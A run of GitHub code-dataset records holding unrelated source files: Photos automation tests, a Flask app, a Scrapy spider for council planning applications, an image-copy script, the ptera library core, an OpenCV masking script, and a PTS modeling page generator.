NOTE: this test requires user interaction\"\"\"\n with suspend_capture:\n photoslib.activate\n prompt = (\n \"In Photos, select the photo of the peppers \"\n \"and the photo with a face, then press Enter \"\n \"in this window.\"\n )\n os.system(f'say \"{prompt}\"')\n input(f\"\\n{prompt}\")\n\n sel = photoslib.selection\n assert len(sel) == 2\n ids = [photo.id for photo in sel]\n assert sorted(ids) == sorted(SELECTION_UUIDS)\n\n\ndef test_album_spotlight(photoslib, suspend_capture):\n \"\"\"Test Album.spotlight()\"\"\"\n with suspend_capture:\n album = photoslib.album(\"Farmers Market\")\n album.spotlight()\n prompt = (\n \"Press 'y' if the 'Farmers Market' album \"\n \"is spotlighted in Photos, otherwise press 'n' \"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n\n\ndef test_folder_spotlight(photoslib, suspend_capture):\n \"\"\"Test Folder.spotlight()\"\"\"\n with suspend_capture:\n folder = photoslib.folder(\"Travel\")\n folder.spotlight()\n prompt = (\n \"Press 'y' if the 'Travel' folder \"\n \"is spotlighted in Photos, otherwise press 'n' \"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n\n\ndef test_photo_spotlight(photoslib, suspend_capture):\n \"\"\"Test Photo.spotlight()\"\"\"\n with suspend_capture:\n photo = list(photoslib.photos(uuid=[PHOTO_EXPORT_UUID]))[0]\n photo.spotlight()\n prompt = (\n \"Press 'y' if the photo of the peppers \"\n \"is spotlighted in Photos, otherwise press 'n' \"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n\n\ndef test_reset_photo_spotlight(photoslib, suspend_capture):\n \"\"\"Need to get back to Photos view for subsequent tests to work\"\"\"\n with suspend_capture:\n prompt = \"Select the 'Photos' or 'Library' view in Photos then press 'y'\"\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n\n\ndef test_album_export_photos_reveal_in_finder(photoslib, suspend_capture):\n tmpdir = tempfile.TemporaryDirectory(prefix=\"photoscript_test_\")\n album = photoslib.album(ALBUM_1_NAME)\n album.export(tmpdir.name, reveal_in_finder=True)\n with suspend_capture:\n prompt = (\n f\"Verify photos {ALBUM_1_PHOTO_EXPORT_FILENAMES} are revealed in the Finder \"\n \"by pressing 'y', otherwise, press 'n'.\"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n\n\ndef test_photo_export_reveal_in_finder(photoslib, suspend_capture):\n tmpdir = tempfile.TemporaryDirectory(prefix=\"photoscript_test_\")\n\n photo = photoscript.Photo(PHOTOS_DICT[0][\"uuid\"])\n\n exported = photo.export(tmpdir.name, reveal_in_finder=True)\n exported = [pathlib.Path(filename).name for filename in exported]\n expected = [f\"{pathlib.Path(PHOTOS_DICT[0]['filename']).stem}.jpeg\"]\n assert exported == expected\n files = os.listdir(tmpdir.name)\n assert files == expected\n with suspend_capture:\n prompt = (\n f\"Verify photo {exported} is revealed in Finder \"\n \"by pressing 'y', otherwise press 'n'.\"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n","repo_name":"RhetTbull/PhotoScript","sub_path":"tests/test_0_interactive.py","file_name":"test_0_interactive.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"76"} +{"seq_id":"25093370991","text":"ficha = dict()\nlista = 
list()\nlistaf = list()\nlistai = list()\ncont = 0\nsoma = 0\nwhile True:\n ficha['Nome'] = str(input('Nome: '))\n ficha['Sexo'] = str(input('Sexo [M/F]: ')).upper().strip()\n ficha['Idade'] = int(input('Idade: '))\n stop = str(input('Continuar? [S/N]'))\n lista.append(ficha.copy())\n cont += 1\n soma += ficha['Idade']\n media = soma/cont\n if ficha['Sexo'] in 'Ff':\n listaf.append(ficha['Nome'])\n if stop in 'Nn':\n break\nprint(f'Ao todo {len(lista)} pessoas foram cadastradas')\nprint(f'A média de idade dos inscritos foi {media:.2f} anos')\nprint(f'A lista de mulheres do grupo é: {listaf}')\nprint(f'A lista de pessoas mais velhas do que a média é: {listai}')\n\n\n\n","repo_name":"danpinheiro97/indices-bioestatistica","sub_path":"pythonProject/ex94.py","file_name":"ex94.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39821024286","text":"g = lambda: [*map(int, input().split())]\r\n\r\nN, K = g()\r\nnums = []\r\nfor i in range(1, N+1):\r\n tmp = g() + [i]\r\n nums.append(tmp)\r\nnums.sort()\r\nnums = nums[-K:]\r\nans = max(nums, key=lambda x: x[1])[2]\r\nprint(ans)","repo_name":"juwkim/boj","sub_path":"백준/Silver/6160. Election Time/Election Time.py","file_name":"Election Time.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10061140029","text":"from flask import Flask\nfrom flask.json import JSONEncoder\nfrom flask_cors import CORS, cross_origin\nfrom app.routes import main\nfrom app.routes import api\nfrom app.database import db\nfrom app.tools.models import States\n\n\n# http://flask.pocoo.org/snippets/119/\nclass CustomJSONEncoder(JSONEncoder):\n def default(self, obj):\n try:\n if isinstance(obj, States):\n return str(obj.value)\n iterable = iter(obj)\n except TypeError:\n pass\n else:\n return list(iterable)\n return JSONEncoder.default(self, obj)\n\n\ndef create_app(object_name):\n app = Flask(__name__)\n CORS(app)\n app.json_encoder = CustomJSONEncoder\n\n app.config.from_object(object_name)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n\n app.register_blueprint(main)\n app.register_blueprint(api, url_prefix='/api')\n\n return app\n","repo_name":"WattoolsPlus/wattools","sub_path":"server/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29527155494","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy_selenium import SeleniumRequest\nfrom scrapy.selector import Selector\nimport time\nimport datetime\n\n\nclass CumberappsSpider(scrapy.Spider):\n name = 'cumberApps'\n urls = [\n 'https://cumberland-eplanning.t1cloud.com/Pages/XC.Track/SearchApplication.aspx?d=thismonth&k=DeterminationDate&',\n 'https://cumberland-eplanning.t1cloud.com/Pages/XC.Track/SearchApplication.aspx?d=thismonth&k=LodgementDate&'\n ]\n\n def convert_dateTime(self, value):\n try:\n date_time_obj = datetime.datetime.strptime(value, '%d/%m/%Y')\n return date_time_obj.date()\n except:\n return None\n\n def remove_nonUTF_char(self, value):\n try:\n filter1 = value.replace('\\n', ' ').replace('\\r', '')\n #return bytes(filter1, 'utf-8').decode('utf-8','ignore')\n return filter1\n except:\n return None\n\n def gen_app_url(self, rel_url):\n try:\n return f\"https://cumberland-eplanning.t1cloud.com/{rel_url.strip('../..')}\"\n except:\n 
return None\n\n def get_applicants(self, applicant_list):\n app_list = []\n try:\n for applicant in applicant_list:\n if applicant.startswith(\"Applicant\"):\n x1 = applicant.replace('Applicant: ','')\n app_list.append(self.remove_nonUTF_char(x1))\n return f\"{','.join([str(i) for i in app_list])}\"\n except:\n return None\n\n def start_requests(self):\n yield SeleniumRequest(\n url=self.urls[0],\n wait_time=8,\n callback=self.app_listings\n )\n\n def app_listings(self, response):\n driver = response.meta['driver']\n cntr = True\n while cntr:\n time.sleep(3)\n html = driver.page_source\n response = Selector(text=html)\n\n app_listings = response.xpath(\"//div[@id='searchresult']/div[@class='result']\")\n for apps in app_listings:\n url = self.gen_app_url(apps.xpath(\".//a[@class='search']/@href\").get())\n applicant = apps.xpath(\".//div/text()\").getall()\n yield scrapy.Request(\n url=url,\n callback=self.parse,\n meta={\n 'applicant': applicant\n }\n )\n\n next_page = response.xpath(\"//a[@class='next']\")\n if next_page:\n np = driver.find_element_by_xpath(\"//a[@class='next']\")\n np.click()\n else:\n cntr = False\n\n for url in self.urls[1:]:\n yield SeleniumRequest(\n url=url,\n wait_time=8,\n callback=self.app_listings\n )\n\n def parse(self, response):\n yield{ \n 'appNum': self.remove_nonUTF_char(response.xpath(\"normalize-space(//h2/text())\").get()),\n 'nameLGA': 'Cumberland',\n 'codeLGA': '12380',\n 'address': self.remove_nonUTF_char(response.xpath(\"normalize-space(//div[@class='applicationInfoDetail']/a/text())\").get()),\n 'activity': self.remove_nonUTF_char(response.xpath(\"normalize-space(//div[text()='Description:']/following-sibling::div/text())\").get()),\n 'applicant': self.get_applicants(response.request.meta['applicant']),\n 'lodgeDate': self.convert_dateTime(response.xpath(\"normalize-space(//div[text()='Lodged date:']/following-sibling::div/text())\").get()),\n 'decisionDate': self.convert_dateTime(response.xpath(\"normalize-space(//div[text()='Decision date:']/following-sibling::div/text())\").get()),\n 'status': self.remove_nonUTF_char(response.xpath(\"normalize-space(//div[text()='Decision:']/following-sibling::div/text())\").get()),\n 'url' : response.url \n }","repo_name":"SurendraTamang/Web-Scrapping","sub_path":"UpWork_Projects/Will Farell_Spiders/cumberlandCityCouncil/cumberlandCityCouncil/spiders/cumberApps.py","file_name":"cumberApps.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30118296369","text":"# coding:utf-8 \n'''\n\n按xml文件中的文件名称,从所有图片中拷贝部分至另一个文件夹\n\ncreated on 2019/7/17\n\n@author:sunyihuan\n'''\n\nimport os\nimport shutil\nimport xml.etree.ElementTree as ET\nfrom tqdm import tqdm\n\n\nclass copy_img(object):\n '''\n 按xml文件中的文件名称,从所有图片中拷贝部分至另一个文件夹\n '''\n\n def __init__(self, xml_dir, img_orginal_dir, img_copy_dir):\n '''\n :param xml_dir: xml文件地址(全路径)\n :param img_orginal_dir: 原jpg图片地址,含即所有图片的文件夹\n :param img_copy_dir: xml文件对应jpg图片要保存的文件夹(全路径)\n '''\n self.xml_dir = xml_dir\n self.img_orginal_dir = img_orginal_dir\n self.img_copy_dir = img_copy_dir\n\n def copy_imgs(self, target_label):\n for file in tqdm(os.listdir(self.xml_dir)):\n if str(file).endswith(\"xml\"):\n xml_file = self.xml_dir + \"/\" + file\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for object1 in root.findall('object'):\n for sku in object1.findall('name'):\n label = sku.text\n if label == target_label:\n img_orginal_file = os.path.join(self.img_orginal_dir, 
file.split(\".\")[0] + \".jpg\")\n img_copy_file = os.path.join(self.img_copy_dir, file.split(\".\")[0] + \".jpg\")\n shutil.copy(img_orginal_file, img_copy_file)\n\n def copy_all_classes(self):\n '''\n 将所有类别,按类别分别拷入对应文件夹\n :return:\n '''\n for file in tqdm(os.listdir(self.xml_dir)):\n if str(file).endswith(\"xml\"):\n xml_file = self.xml_dir + \"/\" + file\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for object1 in root.findall('object'):\n for sku in object1.findall('name'):\n label = sku.text\n img_cop_dir = self.img_copy_dir + \"/\" + label\n if not os.path.exists(img_cop_dir): os.mkdir(img_cop_dir)\n try:\n img_orginal_file = os.path.join(self.img_orginal_dir, file.split(\".\")[0] + \".jpg\")\n img_copy_file = os.path.join(img_cop_dir, file.split(\".\")[0] + \".jpg\")\n shutil.copy(img_orginal_file, img_copy_file)\n except:\n print(file)\n\n\nif __name__ == \"__main__\":\n xml_dir = \"F:/model_data/XDSJ/all_data/20221115/Annotations\"\n img_orginal_dir = \"F:/model_data/XDSJ/all_data/20221115/JPGImages\"\n target_label=\"patchboard\"\n img_copy_dir = \"F:/model_data/XDSJ/all_data/20221115/JPGImages_{}\".format(target_label)\n if not os.path.exists(img_copy_dir): os.mkdir(img_copy_dir)\n\n ci = copy_img(xml_dir, img_orginal_dir, img_copy_dir)\n ci.copy_imgs(target_label)\n","repo_name":"sunyihuan326/JY_detection","sub_path":"data_script/copy_img/copy_imgs_from_xmlname.py","file_name":"copy_imgs_from_xmlname.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39738793541","text":"base_responses = {\n 400: {\"description\": \"Bad Request\"},\n 404: {\"description\": \"Not Found\"},\n 422: {\"description\": \"Validation Error\"},\n 500: {\"description\": \"Internal Server Error\"}\n}\n\ngeneral_responses = {\n **base_responses,\n 200: {\n \"content\": {\n \"application/json\": {\n \"example\": {\n \"message\": \"Success\"\n }\n }\n },\n }\n}\n","repo_name":"Tanmay000009/StoreMonitor","sub_path":"src/schemas/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74069118964","text":"import functools\nimport inspect\nfrom collections import defaultdict\nfrom contextlib import contextmanager\nfrom contextvars import ContextVar\nfrom copy import copy\nfrom itertools import chain, count\n\nfrom .categories import match_category\nfrom .selector import to_pattern\nfrom .selfless import Selfless, choose, override\nfrom .utils import ABSENT, ACTIVE, COMPLETE, FAILED, call_with_captures, setvar\n\n_cnt = count()\n\n\nclass Frame:\n\n top = ContextVar(\"Frame.top\", default=None)\n\n def __init__(self, fname):\n self.function_name = fname\n self.accumulators = defaultdict(list)\n self.to_close = []\n\n def register(self, acc, captures, close_at_exit):\n for cap in captures:\n self.accumulators[cap.name].append((cap, acc))\n if close_at_exit:\n self.to_close.append(acc)\n\n def get_accumulators(self, varname):\n return chain(self.accumulators[varname], self.accumulators[None])\n\n def run(self, method, varname, category, value=ABSENT, mayfail=True):\n rval = ABSENT\n for element, acc in self.get_accumulators(varname):\n acc = acc.match(element, varname, category, value, mayfail=mayfail)\n if acc:\n tmp = getattr(acc, method)(element, varname, category, value)\n if tmp is not ABSENT:\n rval = tmp\n return rval\n\n def set(self, varname, key, category, 
value):\n self.run(\"varset\", varname, category, value)\n\n def get(self, varname, key, category):\n rval = self.run(\"varget\", varname, category, mayfail=False)\n if rval is ABSENT:\n raise NameError(f\"Cannot get value for variable `{varname}`\")\n return rval\n\n def exit(self):\n for acc in self.to_close:\n acc.close()\n\n\nclass Capture:\n def __init__(self, element):\n self.element = element\n self.capture = element.capture\n self.names = []\n self.values = []\n\n @property\n def name(self):\n if self.element.name is not None:\n return self.element.name\n if len(self.names) == 0:\n raise ValueError(f\"No name for capture `{self.capture}`\")\n if len(self.names) > 1:\n raise ValueError(\n f\"Multiple names stored for capture `{self.capture}`\"\n )\n return self.names[0]\n\n @property\n def value(self):\n if len(self.values) == 0:\n raise ValueError(f\"No value for capture `{self.capture}`\")\n if len(self.values) > 1:\n raise ValueError(\n f\"Multiple values stored for capture `{self.capture}`\"\n )\n return self.values[0]\n\n def nomatch(self):\n return None if self.element.name is None else False\n\n def check(self, varname, category, value):\n el = self.element\n assert el.name is None or varname == el.name\n if not match_category(el.category, category, value):\n return self.nomatch()\n elif el.value is not ABSENT and el.value != value:\n return self.nomatch()\n else:\n return True\n\n def acquire(self, varname, value):\n assert varname is not None\n self.names.append(varname)\n self.values.append(value)\n\n def __str__(self):\n return f\"Capture({self.element}, {self.names}, {self.values})\"\n\n __repr__ = __str__\n\n\nclass Accumulator:\n def __init__(\n self,\n names,\n parent=None,\n rules=None,\n template=True,\n pattern=None,\n focus=True,\n ):\n self.id = next(_cnt)\n self.names = set(names)\n self.pattern = pattern\n self.parent = parent\n self.children = []\n self.rules = rules or defaultdict(list)\n self.captures = {}\n self.status = ACTIVE\n self.template = template\n self.focus = focus\n if self.parent is not None:\n self.parent.children.append(self)\n\n def getcap(self, element):\n if element.capture not in self.captures:\n cap = Capture(element)\n self.captures[element.capture] = cap\n return self.captures[element.capture]\n\n def fail(self):\n self.status = FAILED\n for leaf in self.leaves():\n leaf.status = FAILED\n\n def match(self, element, varname, category, value, mayfail=True):\n if self.status is FAILED:\n return None\n if element.focus:\n acc = self.fork()\n else:\n acc = self\n cap = acc.getcap(element)\n status = cap.check(varname, category, value)\n if status is True:\n return acc\n elif status is False:\n if mayfail:\n self.fail()\n return None\n else:\n return None\n\n def varset(self, element, varname, category, value):\n if self.status is FAILED:\n return\n cap = self.getcap(element)\n cap.acquire(varname, value)\n\n def varget(self, element, varname, category, _):\n if not element.focus or self.status is FAILED:\n return ABSENT\n cap = self.getcap(element)\n cap.names.append(varname)\n rval = self.run(\"value\", may_fail=False)\n if rval is ABSENT:\n cap.names.pop()\n else:\n cap.values.append(rval)\n return rval\n\n def build(self):\n rval = {}\n curr = self\n while curr:\n rval.update(\n {\n name: cap\n for name, cap in curr.captures.items()\n if (cap.values or cap.names) and name is not None\n }\n )\n curr = curr.parent\n return rval\n\n def run(self, rulename, may_fail):\n if self.status is FAILED:\n return FAILED\n rval = ABSENT\n for fn in 
self.rules[rulename]:\n args = self.build()\n _, names = get_names(fn)\n if may_fail and set(args) != set(names):\n return ABSENT\n else:\n rval = fn(**args)\n return rval\n\n def merge(self, child):\n for name, cap in child.captures.items():\n mycap = self.getcap(cap.element)\n mycap.names += cap.names\n mycap.values += cap.values\n\n def leaves(self):\n if not self.children and self.focus:\n return [self]\n else:\n rval = []\n for child in self.children:\n rval += child.leaves()\n return rval\n\n def _to_merge(self):\n rval = []\n for child in self.children:\n if not child.focus:\n rval.append(child)\n rval += child._to_merge()\n return rval\n\n def close(self):\n if self.status is ACTIVE:\n if self.parent is None:\n for acc in self._to_merge():\n self.merge(acc)\n leaves = self.leaves()\n for leaf in leaves:\n leaf.run(\"listeners\", may_fail=True)\n if not leaves:\n self.run(\"listeners\", may_fail=True)\n self.status = COMPLETE\n\n def fork(self, focus=True):\n parent = None if self.template else self\n return Accumulator(\n self.names,\n parent,\n rules=self.rules,\n template=False,\n pattern=self.pattern,\n focus=focus,\n )\n\n def __str__(self):\n rval = str(self.id)\n curr = self.parent\n while curr:\n rval = f\"{curr.id} > {rval}\"\n curr = curr.parent\n return f\"Accumulator({self.pattern}, {rval})\"\n\n\ndef get_names(fn):\n if hasattr(fn, \"_ptera_argspec\"):\n return fn._ptera_argspec\n else:\n spec = inspect.getfullargspec(fn)\n if spec.args and spec.args[0] == \"self\":\n return None, spec.args[1:]\n else:\n return None, spec.args\n\n\ndef dict_to_collection(*rulesets):\n tmp = {}\n for rules in rulesets:\n for pattern, triggers in rules.items():\n pattern = to_pattern(pattern)\n for name, entries in triggers.items():\n if not isinstance(entries, (tuple, list)):\n entries = [entries]\n for entry in entries:\n focus, names = get_names(entry)\n this_pattern = pattern.rewrite(names, focus=focus)\n if this_pattern not in tmp:\n tmp[this_pattern] = Accumulator(\n names, pattern=this_pattern\n )\n acc = tmp[this_pattern]\n acc.rules[name].append(entry)\n return PatternCollection(list(tmp.items()))\n\n\nclass PatternCollection:\n current = ContextVar(\"PatternCollection.current\", default=None)\n\n def __init__(self, patterns=None):\n self.patterns = patterns or []\n\n def proceed(self, fname, frame):\n next_patterns = []\n to_process = list(self.patterns)\n while to_process:\n pattern, acc = to_process.pop()\n ename = pattern.element.name\n if not pattern.immediate:\n next_patterns.append((pattern, acc))\n if ename is None or ename == fname:\n is_template = acc.template\n acc = acc.fork(focus=pattern.focus or is_template)\n frame.register(acc, pattern.captures, close_at_exit=is_template)\n for child in pattern.children:\n if child.collapse:\n to_process.append((child, acc))\n else:\n next_patterns.append((child, acc))\n rval = PatternCollection(next_patterns)\n return rval\n\n def show(self):\n for pattern, acc in self.patterns:\n print(pattern.encode(), \"\\t\", acc)\n\n\n@contextmanager\ndef newframe():\n frame = Frame(None)\n try:\n with setvar(Frame.top, frame):\n yield frame\n finally:\n frame.exit()\n\n\n@contextmanager\ndef proceed(fname):\n curr = PatternCollection.current.get()\n frame = Frame.top.get()\n if curr is None:\n yield None\n else:\n new = curr.proceed(fname, frame)\n with setvar(PatternCollection.current, new):\n yield new\n\n\n@contextmanager\ndef overlay(*rulesets):\n rulesets = [rules for rules in rulesets if rules]\n\n if not rulesets:\n yield None\n\n 
else:\n collection = dict_to_collection(*rulesets)\n curr = PatternCollection.current.get()\n if curr is not None:\n collection.patterns = curr.patterns + collection.patterns\n with setvar(PatternCollection.current, collection):\n yield collection\n\n\ndef interact(sym, key, category, __self__, value):\n from_state = __self__.get(sym)\n\n if key is None:\n fr = Frame.top.get()\n try:\n fr_value = fr.get(sym, key, category)\n except NameError:\n fr_value = ABSENT\n success, value = choose([value, fr_value, from_state])\n if not success:\n raise NameError(f\"Variable {sym} of {__self__} is not set.\")\n fr.set(sym, key, category, value)\n return value\n\n else:\n assert value is not ABSENT\n with newframe():\n with proceed(sym):\n interact(\"#key\", None, None, __self__, key)\n # TODO: merge the return value of interact (currently raises\n # ConflictError)\n interact(\"#value\", None, category, __self__, value)\n success, value = choose([value, from_state])\n if not success:\n raise NameError(f\"Variable {sym} of {__self__} is not set.\")\n return value\n\n\nclass Collector:\n def __init__(self, pattern, finalize=None):\n self.data = []\n self.pattern = to_pattern(pattern)\n self.finalizer = finalize\n\n def listener(**kwargs):\n self.data.append(kwargs)\n\n listener._ptera_argspec = None, set(self.pattern.all_captures())\n self._listener = listener\n\n def __iter__(self):\n return iter(self.data)\n\n def _map_helper(self, args, transform_all, transform_one):\n if not args:\n return transform_all(self)\n elif isinstance(args[0], str):\n assert all(isinstance(arg, str) for arg in args)\n results = tuple(\n [transform_one(entry[arg]) for entry in self] for arg in args\n )\n if len(args) == 1:\n return results[0]\n else:\n return list(zip(*results))\n else:\n assert len(args) == 1\n (fn,) = args\n return [\n call_with_captures(fn, entry) for entry in transform_all(self)\n ]\n\n def map(self, *args):\n return self._map_helper(\n args=args,\n transform_all=lambda self: [\n {key: cap.value for key, cap in entry.items()} for entry in self\n ],\n transform_one=lambda entry: entry.value,\n )\n\n def map_all(self, *args):\n return self._map_helper(\n args=args,\n transform_all=lambda self: [\n {key: cap.values for key, cap in entry.items()}\n for entry in self\n ],\n transform_one=lambda entry: entry.values,\n )\n\n def map_full(self, *args):\n return self._map_helper(\n args=args,\n transform_all=lambda self: self,\n transform_one=lambda entry: entry,\n )\n\n def rules(self):\n return {self.pattern: {\"listeners\": [self._listener]}}\n\n def finalize(self):\n if self.finalizer:\n return self.finalizer(self)\n else:\n return self\n\n\nclass Tap:\n hasoutput = True\n\n def __init__(self, selector, finalize=None):\n self.selector = selector\n self.finalize = finalize\n\n def hook(self, finalize):\n self.finalize = finalize\n return self\n\n def instantiate(self):\n return Collector(self.selector, self.finalize)\n\n\nclass CallResults:\n def __init__(self, value):\n self.value = value\n setattr(self, \"0\", self.value)\n\n def __getitem__(self, item):\n if isinstance(item, int):\n item = str(item)\n try:\n return getattr(self, item)\n except AttributeError:\n raise IndexError(item)\n\n\nclass StateOverlay:\n hasoutput = False\n\n def __init__(self, values):\n self._rules = {patt: {\"value\": value} for patt, value in values.items()}\n\n def rules(self):\n return self._rules\n\n def instantiate(self):\n return self\n\n def finalize(self):\n return self\n\n\ndef _to_plugin(spec):\n return Tap(spec) if 
isinstance(spec, str) else spec\n\n\ndef _collect_plugins(plugins, kwplugins):\n plugins = {str(i + 1): p for i, p in enumerate(plugins)}\n plugins.update(kwplugins)\n plugins = {name: _to_plugin(p) for name, p in plugins.items()}\n return plugins, any(p.hasoutput for name, p in plugins.items())\n\n\nclass PteraFunction(Selfless):\n def __init__(\n self, fn, state, callkey=None, plugins=None, return_object=False\n ):\n super().__init__(fn, state)\n self.callkey = callkey\n self.plugins = plugins or {}\n self.return_object = return_object\n\n def clone(self, **kwargs):\n kwargs = {\n \"fn\": self.fn,\n \"state\": copy(self.state),\n \"callkey\": self.callkey,\n \"plugins\": self.plugins,\n \"return_object\": self.return_object,\n **kwargs,\n }\n return type(self)(**kwargs)\n\n def __getitem__(self, callkey):\n assert self.callkey is None\n return self.clone(callkey=callkey)\n\n def tweak(self, values, priority=2):\n values = {\n k: lambda __v=v, **_: override(__v, priority)\n for k, v in values.items()\n }\n return self.using(StateOverlay(values))\n\n def rewrite(self, values, full=False, priority=2):\n def _wrapfn(fn, full=True):\n @functools.wraps(fn)\n def newfn(**kwargs):\n return override(\n call_with_captures(fn, kwargs, full=full), priority=priority\n )\n\n newfn._ptera_argspec = get_names(fn)\n return newfn\n\n values = {k: _wrapfn(v, full=full) for k, v in values.items()}\n return self.using(StateOverlay(values))\n\n def using(self, *plugins, **kwplugins):\n plugins, return_object = _collect_plugins(plugins, kwplugins)\n return self.clone(\n plugins={**self.plugins, **plugins}, return_object=return_object,\n )\n\n def use(self, *plugins, **kwplugins):\n plugins, _ = _collect_plugins(plugins, kwplugins)\n self.plugins.update(plugins)\n return self\n\n def collect(self, query):\n plugin = _to_plugin(query)\n\n def deco(fn):\n self.plugins[fn.__name__] = plugin.hook(fn)\n\n return deco\n\n def on(self, query, full=False, all=False):\n plugin = _to_plugin(query)\n\n def deco(fn):\n def finalize(coll):\n if full:\n return coll.map_full(fn)\n elif all:\n return coll.map_all(fn)\n else:\n return coll.map(fn)\n\n self.plugins[fn.__name__] = plugin.hook(finalize)\n\n return deco\n\n def __call__(self, *args, **kwargs):\n rulesets = []\n with newframe():\n plugins = {\n name: p.instantiate() for name, p in self.plugins.items()\n }\n for plugin in plugins.values():\n rulesets.append(plugin.rules())\n with overlay(*rulesets):\n with proceed(self.fn.__name__):\n if self.callkey is not None:\n interact(\"#key\", None, None, self, self.callkey)\n rval = super().__call__(*args, **kwargs)\n\n callres = CallResults(rval)\n for name, plugin in plugins.items():\n setattr(callres, name, plugin.finalize())\n\n if self.return_object:\n return callres\n else:\n return rval\n","repo_name":"breuleux/orig-ptera","sub_path":"ptera/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":18295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20167098745","text":"import numpy as np\r\nimport cv2 as cv\r\n\r\norignal=cv.imread('pic1.jpg',0)\r\nMask_app=cv.imread('Segmented Image.jpg',0)\r\nrows=Mask_app.shape[0]\r\ncols=Mask_app.shape[1]\r\nfor i in range(rows):\r\n for j in range(cols):\r\n if Mask_app[i][j]==0:\r\n Mask_app[i][j]=255\r\n else:\r\n Mask_app[i][j] = 0\r\n\r\n\r\nwidth = 450\r\nheight = 450\r\ndim = (width, height)\r\n\r\n# resize image\r\norig= cv.resize(orignal, dim, interpolation=cv.INTER_AREA)\r\ncv.imshow('orig', 
orig)\r\n\r\nkernel = np.array([[0, -1, 0],\r\n [-1, 5,-1],\r\n [0, -1, 0]])\r\nimage_sharp = cv.filter2D(src=orig, ddepth=-1, kernel=kernel)\r\ncv.imshow('orig_sharp', image_sharp)\r\n\r\n\r\nMask=cv.bitwise_and(orig,Mask_app)\r\ncv.imshow('mask', Mask)\r\ncv.waitKey(0)","repo_name":"NimraAkmal/DIP-Project","sub_path":"Segmentation(3).py","file_name":"Segmentation(3).py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"2118234392","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n# *****************************************************************\n# ** PTS -- Python Toolkit for working with SKIRT **\n# ** © Astronomical Observatory, Ghent University **\n# *****************************************************************\n\n## \\package pts.modeling.html.all Contains the AllPagesGenerator class.\n\n# -----------------------------------------------------------------\n\n# Ensure Python 3 compatibility\nfrom __future__ import absolute_import, division, print_function\n\n# Import the relevant PTS classes and modules\nfrom pts.modeling.html.index import IndexPageGenerator\nfrom pts.modeling.html.status import StatusPageGenerator\nfrom pts.modeling.html.data import DataPageGenerator\nfrom pts.modeling.html.preparation import PreparationPageGenerator\nfrom pts.modeling.html.components import ComponentsPageGenerator\nfrom pts.modeling.html.photometry import PhotometryPageGenerator\nfrom pts.modeling.html.maps import MapsPageGenerator\nfrom pts.modeling.html.model import ModelPageGenerator\nfrom pts.modeling.html.fitting import FittingPageGenerator\nfrom pts.modeling.html.datacubes import DatacubesPageGenerator\nfrom pts.modeling.html.fluxes import FluxesPageGenerator\nfrom pts.modeling.html.images import ImagePageGenerator\nfrom pts.modeling.html.attenuation import AttenuationPageGenerator\nfrom pts.modeling.html.colours import ColoursPageGenerator\nfrom pts.modeling.html.heating import HeatingPageGenerator\nfrom pts.core.basics.log import log\nfrom ..component.galaxy import GalaxyModelingComponent\nfrom ..core.progression import create_modeling_progression\nfrom ...core.tools import browser\n\n# -----------------------------------------------------------------\n\nclass AllPagesGenerator(GalaxyModelingComponent):\n\n \"\"\"\n This function ...\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n\n \"\"\"\n This function ...\n \"\"\"\n\n # Call the constructor of the base class\n super(AllPagesGenerator, self).__init__(*args, **kwargs)\n\n # The modeling progression to use to generate the pages\n self.progression = None\n\n # -----------------------------------------------------------------\n\n def run(self, **kwargs):\n\n \"\"\"\n This function ...\n :param kwargs:\n :return:\n \"\"\"\n\n # 1. Setup\n self.setup(**kwargs)\n\n # 2. Generate the index page\n if self.has_properties: self.generate_index()\n\n # 3. Generate the status page\n self.generate_status()\n\n # 4. Generate the data page\n if self.has_images: self.generate_data()\n\n # 5. Generate the preparation page\n if self.has_prepared: self.generate_preparation()\n\n # 6. Generate the components page\n if self.has_components: self.generate_components()\n\n # 7. Generate the photometry page\n if self.has_photometry: self.generate_photometry()\n\n # 8. Generate the maps page, if maps are chosen to construct a model\n if self.has_model: self.generate_maps()\n\n # 9. 
